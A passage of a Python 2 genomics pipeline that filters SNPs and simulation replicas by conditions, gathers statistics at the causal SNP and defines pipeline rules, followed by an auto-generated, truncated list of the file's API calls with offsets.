  dbg( '"findSnpsMatchingConds" scenCond snpTables snpCond replicaTables replicaCond showHeadings showVals '
       'scen2sfxs' )
  # args shared with findReplicasMatchingConds(); Dict('...') captures the like-named locals
  replicaArgs = Dict( 'Ddata thinSfx scenCond allScens scen2sfxs' )
  snpTableNames, snpTables, ourScens, scen2table2file, depends_on = \
      findTableFiles( whichStats = 'snpStats', tables = snpTables, **replicaArgs )
  # the rule also depends on the replicastats tables used by the replica-level conditions
  if getio: return dict( depends_on = depends_on + findTableFiles( whichStats = 'replicastats', tables = replicaTables,
                                                                   **replicaArgs )[-1],
                         creates = outFile )
  snpCondExpr = compile_expr( snpCond )
  showVals = MakeSeq( showVals )
  # NOTE(review): re-used per SNP below; relies on Python 2 map() returning a list
  showValsExpr = map( compile_expr, showVals )
  if not showHeadings: showHeadings = map( MakeAlphaNum, showVals )
  # NOTE(review): these outer counters are never read -- makeResult() rebinds its own
  numSnpsSkippedTot, numSnpsAllowedTot = 0, 0
  def makeResult():
    # generator producing the output rows; wrapped in an IDotData below
    yield ( 'scenario', 'replicaNum', 'Pos' ) + tuple( MakeSeq( showHeadings ) )
    for scen in ourScens:
      dbg( '"findSnpsMatchingConds" scen ')
      numSnpsAllowed, numSnpsSkipped = 0, 0
      # determine which replicas of this scenario pass the replica-level conditions
      replicasHere = findReplicasMatchingConds( **MergeDicts( replicaArgs,
                                                              Dict( 'replicaTables replicaCond scenCond',
                                                                    allScens = ( scen, ) ) ) )
      replicasHereSet = frozenset( replicasHere.replicaNum )
      dbg( 'scen len(replicasHereSet) replicasHereSet' )
      thisScenDict = scen2table2file[ scen ]
      dbg( '#[ ( thisScenDict[ snpTable ] ) for snpTable in snpTables ]' )
      snpTableVals = [ IDotData( thisScenDict[ snpTable ] ) for snpTable in snpTables ]
      # cache the replica-membership test across consecutive rows of the same replica
      lastReplica = None
      lastReplicaResult = None
      replicaCol = FindChromCol( snpTableVals[ 0 ] )
      posCol = FindPosCol( snpTableVals[ 0 ] )
      # NOTE(review): the *Tot counters are re-zeroed for every scenario, so the final
      # dbg below reports only the last scenario's counts -- possibly unintended.
      numSnpsSkippedTot, numSnpsAllowedTot = 0, 0
      # inner-join the SNP tables on (replica, position) so each iteration sees the
      # matching row from every table at once
      for snpTableRows in \
            IDotData.TableIterInnerJoinAuxAsTuples( tableIters = map( iter, snpTableVals ),
                                                    cols = zip( map( FindChromCol, snpTableVals ),
                                                                map( FindPosCol, snpTableVals ) ),
                                                    blanks = ( None, ) * len( snpTableVals ),
                                                    headingLens = map( IDotData.rootClass.numCols,
                                                                       snpTableVals ) ):
        thisReplica = snpTableRows[0][ replicaCol ]
        if thisReplica != lastReplica:
          thisReplicaResult = ( thisReplica in replicasHereSet )
          if not thisReplicaResult: dbg( '"SKIPPING_REPLICA" thisReplica' )
          # NOTE(review): lastReplicaResult is assigned but never read; the branch below
          # reads thisReplicaResult, which persists across rows of the same replica.
          lastReplicaResult = thisReplicaResult
          lastReplica = thisReplica
        if thisReplicaResult:
          # expose each table's current row under the table's name when evaluating the exprs
          localDict = dict( zip( snpTableNames, snpTableRows ) )
          evalHere = lambda expr: eval( expr, globals(), localDict )
          evalResult = evalHere( snpCondExpr )
          if evalResult:
            v = [ scen.scenName(), thisReplica, snpTableRows[0][ posCol ] ] \
                + map( evalHere, showValsExpr )
            numSnpsAllowed += 1
            yield v
          else: numSnpsSkipped += 1
      numSnpsSkippedTot += numSnpsSkipped
      numSnpsAllowedTot += numSnpsAllowed
      dbg( 'scen numSnpsSkippedTot numSnpsAllowedTot' )
    dbg( '"finalCount" numSnpsSkippedTot numSnpsAllowedTot' )
  r = IDotData.fromFn( makeResult )
  if outFile: r.save( outFile )
  return r
def gatherCausalStat( Ddata, scenario, snpStatFN, replicaCol = 'Chrom', posCol = 'Pos', getio = None ):
    """Gather a specified per-SNP statistic just for the causal SNPs, and write them out as a replicastat.

    Params:

       Ddata - root data directory (unused in the body; kept for pipeline interface)
       scenario - the scenario this statistic belongs to; used only for rule attributes
       snpStatFN - per-SNP statistics file, located under a 'snpStats' path component
       replicaCol - name of the replica/chromosome column (unused; kept for interface compatibility)
       posCol - name of the SNP-position column
       getio - if true, just return this rule's inputs/outputs (pipeline support)

    Writes the rows whose position equals CAUSAL_POS to the corresponding file under
    'replicastats', preserving all columns.
    """
    # Derive the output path by swapping the first 'snpStats' path component for
    # 'replicastats'.  Uses the str method instead of the deprecated Python-2
    # string.replace() module function (removed in Python 3); behavior is identical.
    replicaStatFN = snpStatFN.replace( 'snpStats', 'replicastats', 1 )
    if getio: return dict( depends_on = snpStatFN, creates = replicaStatFN, attrs = dict( scenario = scenario.scenDir() ) )
    snpStatFile = IDotData( snpStatFN )
    # copy only the rows at the causal SNP position, keeping the original headings
    with IDotData.openForWrite( replicaStatFN, snpStatFile.headings ) as replicaStatFile:
        for r in snpStatFile:
            if r[ posCol ] == CAUSAL_POS:
                replicaStatFile.writeRecord( r )
def DefineRulesTo_gatherCausalStat( pr, Ddata, scen2snpStatFN, posCol = 'Pos' ):
  """Define rules to gather a specified per-SNP statistic for the causal SNPs into a replica stat.

  Params:

     pr - the pipeline object on which addInvokeRule() is called, one rule per scenario
     Ddata - root data directory, forwarded to gatherCausalStat()
     scen2snpStatFN - map from scenario to the snpStats file holding the per-SNP statistic
     posCol - name of the SNP-position column in each snpStats file
  """
  for scenario, snpStatFN in scen2snpStatFN.items():
    # NOTE(review): Dict('...') presumably captures the like-named locals from this frame,
    # so the loop variable names must stay matching gatherCausalStat's parameter names.
    pr.addInvokeRule( invokeFn = gatherCausalStat, invokeArgs = Dict( 'Ddata scenario snpStatFN posCol' ) )
| [
"Operations.Shari_Operations.localize.Scenario.GetScenarios",
"Operations.MiscUtil.dbg",
"matplotlib.pyplot.ylabel",
"Operations.MiscUtil.compile_expr",
"Operations.MiscUtil.ReplaceFileExt",
"itertools.izip",
"Operations.MiscUtil.Dict",
"operator.itemgetter",
"logging.info",
"Operations.Shari_Oper... | [((871, 892), 'matplotlib.use', 'matplotlib.use', (['"""agg"""'], {}), "('agg')\n", (885, 892), False, 'import matplotlib\n'), ((4643, 4683), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', (['mutAges', 'mutPops', 'mutFreqs'], {}), '(mutAges, mutPops, mutFreqs)\n', (4655, 4683), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((5606, 5628), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaTables'], {}), '(replicaTables)\n', (5613, 5628), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5647, 5665), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['snpTables'], {}), '(snpTables)\n', (5654, 5665), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5695, 5720), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['replicaCond'], {}), '(replicaCond)\n', (5707, 5720), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5741, 5762), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['snpCond'], {}), '(snpCond)\n', (5753, 5762), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5783, 5804), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['snpStat'], {}), '(snpStat)\n', (5795, 5804), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, 
PrintDictDiff\n'), ((5822, 5846), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx'], {}), '(outFile, sfx)\n', (5832, 5846), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5868, 5896), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (5878, 5896), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((5911, 5925), 'Operations.MiscUtil.IsSeq', 'IsSeq', (['scenSfx'], {}), '(scenSfx)\n', (5916, 5925), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7686, 7734), 'Operations.MiscUtil.Histogrammer', 'Histogrammer', ([], {'binSize': 'binSize', 'binShift': 'binShift'}), '(binSize=binSize, binShift=binShift)\n', (7698, 7734), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7791, 7810), 'itertools.izip', 'izip', (['*snpTableVals'], {}), '(*snpTableVals)\n', (7795, 7810), False, 'from itertools import izip\n'), ((8562, 8607), 'logging.info', 'logging.info', (['"""saving histogram to """', 'outFile'], {}), "('saving histogram to ', outFile)\n", (8574, 8607), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((8920, 8934), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (8932, 8934), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((9522, 9562), 
'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx', 'replicaCondSfx'], {}), '(outFile, sfx, replicaCondSfx)\n', (9532, 9562), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((9584, 9612), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (9594, 9612), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((9627, 9702), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx replicaTables scenCond replicaCond scen2sfxs allScens"""'], {}), "('Ddata thinSfx replicaTables scenCond replicaCond scen2sfxs allScens')\n", (9631, 9702), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((10102, 10131), 'Operations.MiscUtil.Histogrammer', 'Histogrammer', ([], {'binSize': 'binSize'}), '(binSize=binSize)\n', (10114, 10131), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((10541, 10555), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (10553, 10555), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((11137, 11189), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx', 'replicaCondSfx', 'snpCondSfx'], {}), '(outFile, sfx, replicaCondSfx, snpCondSfx)\n', (11147, 11189), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, 
IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((11211, 11239), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (11221, 11239), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((11254, 11357), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx snpTables snpCond replicaTables scenCond replicaCond scen2sfxs allScens"""'], {}), "(\n 'Ddata thinSfx snpTables snpCond replicaTables scenCond replicaCond scen2sfxs allScens'\n )\n", (11258, 11357), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((11742, 11771), 'Operations.MiscUtil.Histogrammer', 'Histogrammer', ([], {'binSize': 'binSize'}), '(binSize=binSize)\n', (11754, 11771), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((12082, 12110), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (12092, 12110), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((13463, 13481), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['histFiles'], {}), '(histFiles)\n', (13470, 13481), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((13614, 13638), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx'], {}), '(outFile, sfx)\n', (13624, 13638), False, 'from 
Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((13933, 13962), 'matplotlib.pyplot.figure', 'pp.figure', (['(1)'], {'figsize': 'figSize'}), '(1, figsize=figSize)\n', (13942, 13962), True, 'import matplotlib.pyplot as pp\n'), ((16512, 16531), 'matplotlib.pyplot.savefig', 'pp.savefig', (['outFile'], {}), '(outFile)\n', (16522, 16531), True, 'import matplotlib.pyplot as pp\n'), ((17136, 17154), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['histFiles'], {}), '(histFiles)\n', (17143, 17154), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((17630, 17659), 'matplotlib.pyplot.figure', 'pp.figure', (['(1)'], {'figsize': '(18, 6)'}), '(1, figsize=(18, 6))\n', (17639, 17659), True, 'import matplotlib.pyplot as pp\n'), ((17681, 17712), 'matplotlib.pyplot.subplots_adjust', 'pp.subplots_adjust', ([], {'bottom': '(0.37)'}), '(bottom=0.37)\n', (17699, 17712), True, 'import matplotlib.pyplot as pp\n'), ((17722, 17752), 'matplotlib.pyplot.xlabel', 'pp.xlabel', (["(xlabel + '\\n\\n\\n\\n')"], {}), "(xlabel + '\\n\\n\\n\\n')\n", (17731, 17752), True, 'import matplotlib.pyplot as pp\n'), ((17759, 17776), 'matplotlib.pyplot.ylabel', 'pp.ylabel', (['ylabel'], {}), '(ylabel)\n', (17768, 17776), True, 'import matplotlib.pyplot as pp\n'), ((17784, 17797), 'matplotlib.pyplot.hold', 'pp.hold', (['(True)'], {}), '(True)\n', (17791, 17797), True, 'import matplotlib.pyplot as pp\n'), ((18840, 18855), 'matplotlib.pyplot.title', 'pp.title', (['title'], {}), '(title)\n', (18848, 18855), True, 'import matplotlib.pyplot as pp\n'), ((19076, 19095), 'matplotlib.pyplot.savefig', 'pp.savefig', (['outFile'], {}), '(outFile)\n', (19086, 19095), True, 'import matplotlib.pyplot as pp\n'), ((19469, 19483), 
'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (19481, 19483), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((21085, 21107), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['scenCond'], {}), '(scenCond)\n', (21097, 21107), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21130, 21151), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaConds'], {}), '(replicaConds)\n', (21137, 21151), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21177, 21202), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaCondsSfxs'], {}), '(replicaCondsSfxs)\n', (21184, 21202), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21225, 21242), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['snpConds'], {}), '(snpConds)\n', (21232, 21242), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21264, 21285), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['snpCondsSfxs'], {}), '(snpCondsSfxs)\n', (21271, 21285), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((21353, 21377), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', 'sfx'], {}), '(outFile, sfx)\n', (21363, 21377), False, 'from Operations.MiscUtil import Dict, compile_expr, 
dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((28874, 28896), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['scenCond'], {}), '(scenCond)\n', (28886, 28896), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((29126, 29147), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaConds'], {}), '(replicaConds)\n', (29133, 29147), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((29173, 29198), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaCondsSfxs'], {}), '(replicaCondsSfxs)\n', (29180, 29198), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((32491, 32513), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaTables'], {}), '(replicaTables)\n', (32498, 32513), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((34530, 34553), 'Operations.Shari_Operations.localize.Scenario.GetSelectionScenarios', 'GetSelectionScenarios', ([], {}), '()\n', (34551, 34553), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((36220, 36241), 'Operations.IDotData.IDotData', 'IDotData', (['condsFileFN'], {}), '(condsFileFN)\n', (36228, 36241), False, 'from Operations.IDotData import IDotData\n'), ((36257, 36275), 'Operations.IDotData.IDotData', 'IDotData', (['inFileFN'], {}), '(inFileFN)\n', (36265, 36275), False, 'from Operations.IDotData 
import IDotData\n'), ((38019, 38033), 'Operations.MiscUtil.dbg', 'dbg', (['"""inFiles"""'], {}), "('inFiles')\n", (38022, 38033), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((38053, 38074), 'Operations.IDotData.IDotData', 'IDotData', (['condsFileFN'], {}), '(condsFileFN)\n', (38061, 38074), False, 'from Operations.IDotData import IDotData\n'), ((39965, 40040), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx replicaTables scenCond scen2sfxs replicaCond allScens"""'], {}), "('Ddata thinSfx replicaTables scenCond scen2sfxs replicaCond allScens')\n", (39969, 40040), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((40474, 40492), 'Operations.MiscUtil.IsSeq', 'IsSeq', (['replicaShow'], {}), '(replicaShow)\n', (40479, 40492), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((42017, 42033), 'matplotlib.pyplot.axis', 'pp.axis', (['"""equal"""'], {}), "('equal')\n", (42024, 42033), True, 'import matplotlib.pyplot as pp\n'), ((42342, 42365), 'matplotlib.pyplot.xlabel', 'pp.xlabel', (['replicaStatX'], {}), '(replicaStatX)\n', (42351, 42365), True, 'import matplotlib.pyplot as pp\n'), ((42372, 42395), 'matplotlib.pyplot.ylabel', 'pp.ylabel', (['replicaStatY'], {}), '(replicaStatY)\n', (42381, 42395), True, 'import matplotlib.pyplot as pp\n'), ((42434, 42453), 'matplotlib.pyplot.savefig', 'pp.savefig', (['outFile'], {}), '(outFile)\n', (42444, 42453), True, 'import matplotlib.pyplot as pp\n'), ((42608, 42623), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['tables'], {}), '(tables)\n', (42615, 42623), False, 'from 
Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((42684, 42706), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['scenCond'], {}), '(scenCond)\n', (42696, 42706), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((45372, 45386), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (45384, 45386), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((45642, 45748), 'Operations.MiscUtil.dbg', 'dbg', (['""""findReplicasMatchingConds" scenCond replicaTables replicaCond showHeadings showVals scen2sfxs"""'], {}), '(\'"findReplicasMatchingConds" scenCond replicaTables replicaCond showHeadings showVals scen2sfxs\'\n )\n', (45645, 45748), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46337, 46362), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['replicaCond'], {}), '(replicaCond)\n', (46349, 46362), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46380, 46397), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showVals'], {}), '(showVals)\n', (46387, 46397), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((48625, 48652), 'Operations.IDotData.IDotData.fromFn', 'IDotData.fromFn', (['makeResult'], {}), '(makeResult)\n', (48640, 48652), 
False, 'from Operations.IDotData import IDotData\n'), ((49057, 49071), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (49069, 49071), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((49414, 49534), 'Operations.MiscUtil.dbg', 'dbg', (['""""findSnpsMatchingConds" scenCond snpTables snpCond replicaTables replicaCond showHeadings showVals scen2sfxs"""'], {}), '(\'"findSnpsMatchingConds" scenCond snpTables snpCond replicaTables replicaCond showHeadings showVals scen2sfxs\'\n )\n', (49417, 49534), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((49563, 49612), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx scenCond allScens scen2sfxs"""'], {}), "('Ddata thinSfx scenCond allScens scen2sfxs')\n", (49567, 49612), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50055, 50076), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['snpCond'], {}), '(snpCond)\n', (50067, 50076), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50094, 50111), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showVals'], {}), '(showVals)\n', (50101, 50111), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((53279, 53306), 'Operations.IDotData.IDotData.fromFn', 'IDotData.fromFn', (['makeResult'], {}), '(makeResult)\n', (53294, 53306), False, 'from Operations.IDotData import IDotData\n'), 
((53598, 53654), 'string.replace', 'string.replace', (['snpStatFN', '"""snpStats"""', '"""replicastats"""', '(1)'], {}), "(snpStatFN, 'snpStats', 'replicastats', 1)\n", (53612, 53654), False, 'import itertools, string\n'), ((53801, 53820), 'Operations.IDotData.IDotData', 'IDotData', (['snpStatFN'], {}), '(snpStatFN)\n', (53809, 53820), False, 'from Operations.IDotData import IDotData\n'), ((5986, 6105), 'os.path.join', 'os.path.join', (['Ddata', "('replicastats' + thinSfx)", 'scenDir', "(replicaTable + ('.tsv' if '.' not in replicaTable else ''))"], {}), "(Ddata, 'replicastats' + thinSfx, scenDir, replicaTable + (\n '.tsv' if '.' not in replicaTable else ''))\n", (5998, 6105), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((7327, 7344), 'Classes.DotData.DotData', 'DotData', ([], {'SVPath': 'f'}), '(SVPath=f)\n', (7334, 7344), False, 'from Classes.DotData import DotData\n'), ((7614, 7632), 'Operations.IDotData.IDotData', 'IDotData', ([], {'SVPath': 'f'}), '(SVPath=f)\n', (7622, 7632), False, 'from Operations.IDotData import IDotData\n'), ((13560, 13596), 'Operations.MiscUtil.ReplaceFileExt', 'ReplaceFileExt', (['histFiles[0]', '""".png"""'], {}), "(histFiles[0], '.png')\n", (13574, 13596), False, 'from Operations.MiscUtil import Dict, 